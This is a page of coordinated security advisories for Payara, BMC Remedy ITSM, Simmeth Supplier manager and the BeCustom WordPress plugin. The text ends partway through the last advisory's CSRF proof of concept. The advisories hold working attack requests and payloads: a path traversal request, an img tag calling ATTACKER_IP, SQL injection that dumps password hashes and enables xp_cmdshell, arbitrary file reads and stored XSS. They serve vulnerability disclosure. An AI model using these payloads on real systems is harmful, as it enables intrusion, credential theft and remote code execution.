<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221114-0 ><br />=======================================================================<br /> title: Path Traversal Vulnerability<br /> product: Payara Platform<br /> vulnerable version: Enterprise: <5.45.0<br /> Community: <6.2022.1, <5.2022.4, <4.1.2.191.38<br /> fixed version: Enterprise: 5.45.0<br /> Community: 6.2022.1, 5.2022.4, 4.1.2.191.38<br /> CVE number: CVE-2022-45129<br /> impact: High<br /> homepage: https://www.payara.fish<br /> found: 2022-09-29<br /> by: Michael Baer (Office Nuremberg)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Payara Micro Community is the open source, lightweight middleware platform of choice<br />for containerized Jakarta EE application deployments. less than 70MB, Payara Micro<br />requires no installation, configuration, or code rewrites."<br /><br />Source: https://www.payara.fish/products/payara-platform-community/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected versions which should be installed<br />immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />Payara Software by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Path Traversal Vulnerability (CVE-2022-45129)<br />A path traversal similar to the old CVE-2021-41381 allows, under some circumstances,<br />to bypass the protection of the WEB-INF/ and META-INF/ folders. It is possible to read<br />files inside these directories of the deployed application. They mostly<br />contain configuration files for the application but may also contain source code.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Path Traversal Vulnerability (CVE-2022-45129)<br />a) (Setup)<br />Deploy a web application at the root context (/). For this PoC,<br />the following application was used: https://github.com/AKSarav/SampleWebApp<br />===============================================================================<br />java -jar ./appserver/extras/payara-micro/payara-micro-distribution/target/payara-micro.jar --port 1234 --deploy app.war --contextroot /<br />===============================================================================<br />This application uses the org.apache.catalina.servlets.DefaultServlet for serving files.<br />The deployment at root (/) is crucial. The webapp has the following structure:<br />.<br />├── WEB-INF<br />│ ├── web.xml<br />│ └── weblogic.xml<br />├── META-INF<br />│ └── context.xml<br />├── index.html<br />└── welcome.jsp<br /><br />b) (Attack)<br />The attacking payload is an HTTP request with a path starting with ../<webapp-name>/<br />(note that it does not start with /). To issue this request, a netcat connection can<br />be used:<br />===============================================================================<br />$ nc localhost 1234<br />GET ../app/WEB-INF/web.xml HTTP/1.1<br />Host: abc<br /><br />===============================================================================<br />The server's response:<br />===============================================================================<br />HTTP/1.1 200 OK<br />Server: Payara Micro #badassfish<br />Accept-Ranges: bytes<br />ETag: W/"688-1664529724289"<br />Last-Modified: Fri, 30 Sep 2022 09:22:04 GMT<br />Content-Type: application/xml<br />Content-Length: 688<br />X-Frame-Options: SAMEORIGIN<br /><br /><?xml version="1.0" encoding="UTF-8"?><br />[...]<br />===============================================================================<br />It is possible to access all files in the app's directory /app.<br />The issue arises because the leading ../ is not detected to<br />escape the context and later the code of StandardContextValve.java<br />only checks the beginning of the path for forbidden directories<br />/META-INF/ and /WEB-INF/.<br />===============================================================================<br />requestPath.toUpperCase().startsWith("/META-INF/", 0)<br />===============================================================================<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The vulnerability has been found in version 5.2022.3 (using jdk8-openjdk 8.345.u01-1)<br />and was verified as well on the Payara6 branch with the latest commit during the time<br />of the test: e5f68cda7a72c0c15fb55b724fe5d2e1e6255510 (using jdk11-openjdk 11.0.16.1.u1-2).<br /><br />In both cases, the application was self-compiled from the official GitHub repository<br />on an Arch Linux distribution.<br /><br />According to the vendor, "This vulnerability affects ALL the distributions of the<br />Payara Platform (Server Full, Server Web, Micro, Embedded, Docker images)<br />in every edition and major version.".<br /><br />The vulnerable versions are all before 6.2022.1, 4.1.2.191.38, 5.2022.4 (Community Edition)<br />and 5.45.0 (Enterprise Edition).<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-05: Contacting vendor through security@payara.fish asking for encryption key.<br /> Vendor agreed to proceed without encrypted channel.<br />2022-10-06: Sent security advisory to vendor.<br />2022-10-08: Vendor cannot reproduce vulnerability.<br />2022-10-10: Sending additional / more detailed information.<br />2022-10-12: Vendor confirms the vulnerability.<br />2022-10-17: Contacting vendor to coordinate release date.<br />2022-10-25: Vendor notifies that fix is applied and live in repository, we should wait<br /> for marketing to put patch notes online.<br />2022-11-02: Contacting vendor to ask for list of affected and fixed versions and CVE<br /> number and whether marketing already sent out the information. No reply.<br />2022-11-09: Identifying new version & patch notes are already available online.<br /> Requesting CVE number through MITRE.<br />2022-11-10: Sending CVE number to vendor<br />2022-11-11: Informing vendor about public release date on 2022-11-14<br />2022-11-14: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor fixed the software to detect illegal path traversals.<br />The fixed versions are<br />* 6.2022.1 (Community Edition)<br />* 5.2022.4 (Community Edition)<br />* 4.1.2.191.38 (Community Edition)<br />* 5.45.0 (Enterprise Edition)<br /><br />The Community Edition can be downloaded from the vendor's website:<br /><br />https://www.payara.fish/downloads/payara-platform-community-edition/<br /><br />The Enterprise Edition can be requested by the sales team of Payara.<br /><br /><br />Further information regarding the vulnerability and releases can be<br />found at the following web site of the vendor:<br /><br />https://blog.payara.fish/whats-new-in-the-november-2022-payara-platform-release<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Michael Baer / @2022<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221110-0 ><br />=======================================================================<br /> title: HTML Injection<br /> product: BMC Remedy ITSM-Suite<br /> vulnerable version: 9.1.10 (= 20.02 in new versioning scheme)<br /> fixed version: 22.1<br /> CVE number: CVE-2022-26088<br /> impact: Low<br /> homepage: https://www.bmc.com/it-solutions/remedy-itsm.html<br /> found: 2021-08-11<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix<br />ITSM service provide out of-the-box IT Information Library (ITIL)<br />service support functionality. Remedy ITSM Suite and BMC Helix ITSM<br />service streamline and automate the processes around IT service desk,<br />asset management, and change management operations. It also enables<br />you to link your business services to your IT infrastructure to help<br />you manage the impact of technology changes on business and business<br />changes on technology — in real time and into the future. In addition,<br />you can understand and optimize the user experience, balance current<br />and future infrastructure investments, and view potential impact on<br />the business by using a real-time service model."<br /><br />Source: https://docs.bmc.com/docs/itsm91/home-608490971.html<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an updated version which should be installed immediately.<br /><br />The vendor states that:<br /> > We have done hardening in version 22.1.<br /> > However, we do not agree with assigning the CVE to this vulnerability.<br /> > As mentioned previously this is an informative vulnerability, and no real<br /> impact is demonstrated.<br /><br /><br />Nevertheless, this can be used to trigger actions on internal services via CSRF or<br />exfiltrate information.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) HTML Injection (CVE-2022-26088)<br />An authenticated attacker who can forward incidents per email is able to inject<br />a limited set of HTML tags. This is accomplished by inserting arbitrary content<br />into the "To:" field of the email. There is a filtering mechanism that prevents<br />the injection of many HTML tags, for example <script>, and it also removes event<br />handlers. An attacker is able to insert an image tag with an arbitrary src URL.<br /><br />After sending the email, an entry is appended into the activity log of the<br />incident which states that $USER has sent an email to <X> recipients. Upon<br />clicking on the number <X>, the injected HTML code is loaded and executed.<br /><br />By inserting an <img> with an arbitrary "src" attribute, an attacker can force<br />the user's browser to make requests to his specified URL. This can be used to<br />trigger actions on internal services via CSRF or exfiltrate information.<br /><br /><br />Proof of concept:<br />-----------------<br />1) HTML Injection (CVE-2022-26088)<br />When an incident is viewed, there is a button which allows forwarding the<br />incident by mail. After entering a TO address and the body of the email, it can<br />be sent by clicking on the send button.<br /><br />The HTML injection can be performed by intercepting this request and changing<br />the 'Email.To.InternetEmail' parameter. The modified request is:<br /><br />-------------------------------------------------------------------------------<br />PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1<br />Host: TARGET<br />Cookie: […]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/plain, */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json;charset=utf-8<br />X-Xsrf-Token: SOME_TOKEN<br />Content-Length: ADAPT_AS_NEEDED<br />Te: trailers<br />Connection: close<br /><br />{<br /> "worknote": "pentest",<br /> "access": true,<br /> "Email.From.Person": {<br /> "email": "SOME_SENDING_MAIL",<br /> "fullName": "Pentest - SEC Consult",<br /> "loginId": "USERNAME"<br /> },<br /> "Email.Subject": "SOME_SUBJECT",<br /> "Email.Body": "test2",<br /> "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test",<br /> "workInfoType": 16000<br />}<br />-------------------------------------------------------------------------------<br /><br />The parameter Email.To.InternetEmail contains the payload. In this case an<br />image tag containing the IP of the attacker was inserted:<br />"<img src=http://LOCAL_IP:8001/>a@example.test"<br />The a@example.test is needed to pass the email validation step and example.test<br />was used to prevent sending out real emails.<br /><br />After this step, the information that $USER has sent an email to 1 recipient<br />will be appended in the activity log of this incident.<br /><br /><br />Now we start a local netcat listener with the command<br />$ nc -vnlp 8001<br /><br />Now we click on the number '1' in the activity log and see that the browser<br />issues a request to our 'netcat' instance.<br /><br />This confirms that the browser tries to load the image from the specified URL.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested:<br />* 9.1.10 this corresponds to version 20.02 as stated at the following URL:<br />https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-09-07: Contacting vendor through email (appsec@bmc.com).<br />2021-09-28: Vendor states that they did not get the first email.<br />2021-09-29: Resending the advisory to their renewed GPG key.<br />2021-10-29: Fix pending, request to delay publication.<br />2021-11-18: Vulnerability is fixed and the fix is being evaluated.<br />2022-01-17: Asking for a status update.<br />2022-01-17: Vulnerability is fixed, no scheduled release.<br />2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'.<br />2022-02-24: Fixed in Smart-IT 22.1, release postponed.<br />2022-03-30: Release postponed to May 2022.<br />2022-04-20: Asking if the fixed version will be released in May.<br />2022-05-17: Asking if the fixed version will be released in May.<br />2022-05-23: Release rescheduled to end of June/July<br />2022-08-04: Asking for status<br />2022-08-05: Product was released<br />2022-08-31: Asking for link to update<br />2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again<br />2022-09-06: Vendor asks for final version of advisory<br />2022-09-06: Asking vendor for a new GPG key because of expiry<br />2022-09-07: Sending the final advisory to the vendor<br />2022-09-12: Vendor will check the advisory and answer in 1 or 2 days<br />2022-09-14: Vendor states that their application is not vulnerable to CSRF and<br /> asks if other data could be leaked via the HTTP request<br />2022-09-15: We clarify that their application does not seem to be vulnerable to<br /> CSRF but the HTML injection allows CSRFing other applications in the intranet.<br /> Also we did not have time to assess if other data besides User-Agent and the<br /> client's IP can be leaked.<br />2022-10-04: We request an update to the previous mail.<br />2022-10-19: Vendor sticks to their own original impact analysis.<br />2022-11-10: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />Upgrade to version 22.1 or later which can be downloaded at the vendor's page:<br />https://www.bmc.com/support/resources/product-downloads.html<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2022<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221109-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Simmeth System GmbH Supplier manager (Lieferantenmanager)<br /> vulnerable version: < 5.6<br /> fixed version: 5.6<br /> CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,<br /> CVE-2022-44015, CVE-2022-44016, CVE-2022-44017<br /> impact: critical<br /> homepage: https://www.simmeth.net<br /> found: 2022-03-01<br /> by: Steffen Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are an innovative B2B software provider for supply chain management,<br />especially in the areas of supplier management over the entire supplier<br />lifecycle and quality control, supply chain key figures and reporting.<br /><br />Our medium-sized family business is a reliable, practice-oriented partner with<br />an extraordinary wealth of experience: since 2002, our currently more than 70<br />medium-sized and corporate customers have trusted our solutions and our<br />pragmatically oriented expertise."<br /><br />Source: https://www.simmeth.net/en/company/about-us<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, to identify and resolve potential further critical security<br />issues.  <br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)<br />An attacker can inject raw SQL queries. By activating MSSQL features, the<br />attacker is able to execute arbitrary commands on the MSSQL server.<br /><br />2) Faulty API Design (CVE-2022-44014)<br />A faulty API design allows an attacker to fetch arbitrary SQL tables per<br />design. This will leak all user passwords and MSSQL hashes.<br /><br />3) Local File Access (CVE-2022-44016)<br />An attacker can download arbitrary files from the web server by abusing an API<br />call.<br /><br />4) Leak of Simmeth's SMTP password<br />A cleartext password for the email account "LM@simmeth.net" is leaked during<br />the login process.<br /><br />5) Stored Cross-Site Scripting (CVE-2022-44012)<br />An attacker can execute JavaScript code in the browser of the victim if a site<br />is loaded. The victim's encrypted password can be stolen and most likely be<br />decrypted.<br /><br />6) Authentication Bypass (CVE-2022-44013)<br />An attacker can access multiple API calls without authentication. Thus, all<br />outlined attacks can be executed without knowing any valid credentials.<br /><br />7) Errors in Session management (CVE-2022-44017)<br />Due to errors in the session management, an attacker can log back into a<br />victim's account after the victim logged out. This is due to the credentials not<br />being cleaned from the local storage after logout.<br /><br />8) Information Disclosure<br />Multiple requests were giving verbose error messages. This helps an attacker in<br />finding and abusing a vulnerability.<br /><br /><br />Proof of concept:<br />-----------------<br />1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)<br />Following API call can be used to execute arbitrary SQL queries via a subquery<br />or stacked query in the table name. Because of vulnerability 6, only a valid<br />username is required to send the request.<br /><br />---------------------------------<br />POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1<br />Content-Length: 1264<br />[...]<br /><br />{<br /> "Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "System": "****"<br /> },<br /> "ResultTab": {<br /> "AutoLoad": false,<br /> "Createable": true,<br /> "Databases": [<br /> {<br /> "System": "****",<br /> "Tables": [<br /> {<br /> "Columns": [],<br /> "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",<br /> "Relations": [],<br /> "Results": [<br /> {<br /> "ColumnName": "*"<br /> }<br /> ]<br /> }<br /> ]<br /> }<br /> ],<br /> "Name": "Results",<br /> "PageSize": 2000<br /> },<br /> "Ids": {},<br /> "SecondaryIds": {},<br /> "Constraints": [],<br /> "DateConstraints": {},<br /> "LogicOperator": 0,<br /> "PageNumber": 0,<br /> "Sortings": {},<br /> "TableFilters": {},<br /> "GroupByField": null,<br /> "Aggregates": {},<br /> "isExport": false<br />}<br /><br />-------------------<br />The POC above shows an example subquery, which will respond with the resulting<br />dataset. Stacked queries will be executed, however, the results will not be<br />contained in the web server's reply. The example query will dump the MSSQL password<br />hashes.<br /><br />Further attacks include arbitrary file read with the following query:<br /><br />(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents<br />)sub;--<br /><br />And code execution via the xp_cmdshell extended procedure:<br /><br />(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;<br />RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell<br />'nslookup some.domain';--<br /><br /><br />2) Faulty API Design (CVE-2022-44014)<br />The API design allows the frontend to supply an arbitrary table name<br />(called <TABLE NAME HERE> in the POC below) into the following request.<br />Because of vulnerability 6, only a valid username is required to send the<br />request.<br /><br />---------------------------------<br />POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1<br />Content-Length: 1264<br />[...]<br /><br />{<br /> "Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "System": "****"<br /> },<br /> "ResultTab": {<br /> "AutoLoad": false,<br /> "Createable": true,<br /> "Databases": [<br /> {<br /> "System": "****",<br /> "Tables": [<br /> {<br /> "Columns": [],<br /> "Name": "<TABLE NAME HERE>",<br /> "Relations": [],<br /> "Results": [<br /> {<br /> "ColumnName": "*"<br /> }<br /> ]<br /> }<br /> ]<br /> }<br /> ],<br /> "Name": "Results",<br /> "PageSize": 2000<br /> },<br /> "Ids": {},<br /> "SecondaryIds": {},<br /> "Constraints": [],<br /> "DateConstraints": {},<br /> "LogicOperator": 0,<br /> "PageNumber": 0,<br /> "Sortings": {},<br /> "TableFilters": {},<br /> "GroupByField": null,<br /> "Aggregates": {},<br /> "isExport": false<br />}<br /><br />-------------------<br /><br />This is a fault by design, as the attacker has full control of the table<br />name. Therefore, an arbitrary table such as the user table<br />(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.<br /><br /><br />3) Local File Access (CVE-2022-44016)<br />The "GetImages" API call can be abused to read arbitrary files from the file<br />system. This is due to the API allowing to set the image path from the<br />frontend.<br /><br />By pointing the base path to C:\, all files can be accessed.<br />Because of vulnerability 6, the request requires no credentials.<br /><br />-----------------------<br />POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1<br />Content-Length: 229<br />[...]<br /><br />{"Credential":{<br />"Mandant":{<br />"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"<br />},<br />},<br />"ImagesPath":"C:\\",<br />"ListImageNames":[<br /> "Windows\\win.ini",<br /> "boot.ini",<br /> "Windows\\system32\\eula.txt",<br /> "Windows\\System32\\drivers\\etc\\hosts"<br />]<br />}<br />--------------------<br />The files are returned base64 encoded. Thus, even binary data can be extracted<br />from the server.<br /><br /><br />4) Leak of Simmeth's SMTP password<br />The following API call will return the current configuration. The configuration<br />seems to contain cleartext credentials from Simmeth's SMTP server. The<br />request does not require any credentials.<br /><br />-----------------<br />POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1<br />Content-Length: 70<br />Content-Type: application/json<br /><br /><br />{<br />"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}<br />}<br />----------------<br /><br />The server responds with:<br /><br />---------------<br />[...]<br />"KPIIntro":{<br />"IsAccessLog":true,<br />"MailSettings":{<br />"Host":"vwp4261.webpack.hosteurope.de",<br />"IsAuthentification":true,<br />"IsSSL":false,<br />"LoginName":"wp10481666-supply",<br />"Password":"K***********a",<br />"Port":"25",<br />"Sender":"LM@simmeth.net"<br />[...]<br />--------------<br />Thus, an attacker could send phishing mails from an official Simmeth account.<br /><br /><br />5) Stored Cross-Site Scripting (CVE-2022-44012)<br />The following request can be used to store JavaScript code into the database. It<br />will be fetched and executed in the victim's browser, once the site is visited.<br />Because of vulnerability 6, only a valid username is required to send the request.<br /><br />--------------<br />POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1<br />Content-Length: 3311<br /><br />{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString<br />":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},<br />"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName"<br />:"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=x<br />onerror=alert(document.domain)>test","Lie_ID":4167},<br />[...]<br />---------------<br /><br />The XSS can be used to steal the encrypted passwords from the local storage.<br />As the API uses cleartext passwords with every request, it is most likely<br />possible to exfiltrate the passwords in cleartext as well.<br /><br /><br />6) Authentication Bypass (CVE-2022-44013)<br />All API calls start by supplying the Credential Object.<br />----------------<br />"Credential": {<br /> "Mandant": {<br /> "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",<br /> "ConnectionString": {<br /> "Available": false,<br /> "System": "****"<br /> },<br /> "Encryption": 1,<br /> "IsWithRegistration": true,<br /> "Name": "****"<br /> },<br /> "Username": "simmeth",<br /> "Password: "*********"<br /> "System": "****"<br /> },<br /><br />----------------<br />However, the password can just be removed. It seems to be only checked on the<br />login API call. Thus, all requests can be made with just a username. The tested<br />environment contained a User called "simmeth".<br />Most likely this is a default user and thus always available, lowering the<br />requirements for authenticated requests even further.<br /><br /><br />7) Errors in Session management (CVE-2022-44017)<br />An attacker can abuse a session management vulnerability in order to log back<br />into a user account after the user logged out.<br />The encrypted password and username saved in the local storage of the<br />web browser is not cleared on logout and always stays valid. Hence, only the state<br />of the frontend state changes and the user appears to be logged out.<br />An attacker can force the frontend state back into the logged in state by<br />visiting: https://<your-host>/LMS/LM/#main<br /><br /><br />8) Information Disclosure<br />The application replies with verbose error messages, when triggering<br />exceptions. This can help an attacker to gain knowledge about the backend and<br />aid in the development of exploits.<br />Entering e.g. a single apostrophe into the table name of vulnerability 2 will<br />cause the web server to print a full stack trace as well as the rest of the SQL<br />query. Hence, the SQL statement can easily be updated to execute properly.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The test was conducted in version 5.4 which was found to be vulnerable.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Contacting vendor through info@simmeth.net<br />2022-04-01: Simmeth requested to know in which customer's environment the<br /> vulnerabilities were discovered.<br />2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.<br />2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already<br /> contains fixes. SEC Consult requests the version number of the fixed version.<br />2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per<br /> unencrypted email.<br />2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.<br />2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new<br /> and currently being fixed.<br />2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.<br /> A new API will be created until the end of the year.<br />2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.<br />2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take<br /> until end of July.<br />2022-09-02: Asking about CVE numbers and if all customers are patched.<br />2022-09-05: Some customers are not yet patched. Current version is phased out by the<br /> end of september. All customers will have to upgrade until then. SEC Consult<br /> will request CVE numbers.<br />2022-10-05: Requested status update.<br />2022-10-17: All customers are updated.<br />2022-11-09: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version 5.6 which fixes the identified<br />security issues. Please approach your vendor support contact in order to receive<br />the patches.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: BeCustom Wordpress Plugin<br />Vendor URL: https://muffingroup.com/betheme/features/be-custom/<br />Type: Cross-Site Request Forgery [CWE-253]<br />Date found: 2021-10-28<br />Date published: 2022-11-10<br />CVSSv3 Score: 5.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N)<br />CVE: CVE-2022-3747<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />BeTheme BeCustom 1.0.5.2 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Built in-house add-on, perfect for agencies and web developers will let you rebrand<br />Be & WordPresss Admin to your own product by replacing all the Be & Muffin logos with<br />own.<br /><br />This tool is supplied exclusively to the customers of Betheme and allows for changes<br />like: complete dashboard customization, replacement of logos, colors managment and much<br />more. With just a few clicks, you will turn the Be & Muffin brand into yours, thanks to<br />which you will increase the trust of your customers.<br /><br />Moreover, from now on you can also customize the WPLogin page.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress plugin lacks an anti-CSRF protection on all of its functionalities, which<br />ultimately allows an attacker to (amongst others):<br /><br />- Set custom brandings<br />- Enable/Disable BeCustom features<br />- Modify the WP Login view<br />- Modify the BeDashboard texts<br /><br />Since there is no anti-CSRF token protecting these functionalities, they are<br />vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform<br />a variety of attacks as mentioned above.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />plugin must be tricked into visiting an arbitrary website while having an authenticated<br />session in the application.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />An exemplary exploit to reset the plugin's configuration:<br /><br /><html><br /> <body><br /> <form action="http://localhost/wp-admin/admin.php?page=be_custom_branding" method="POST"><br /> <input type="hidden" name="betheme_label" value="" /><br /> <input 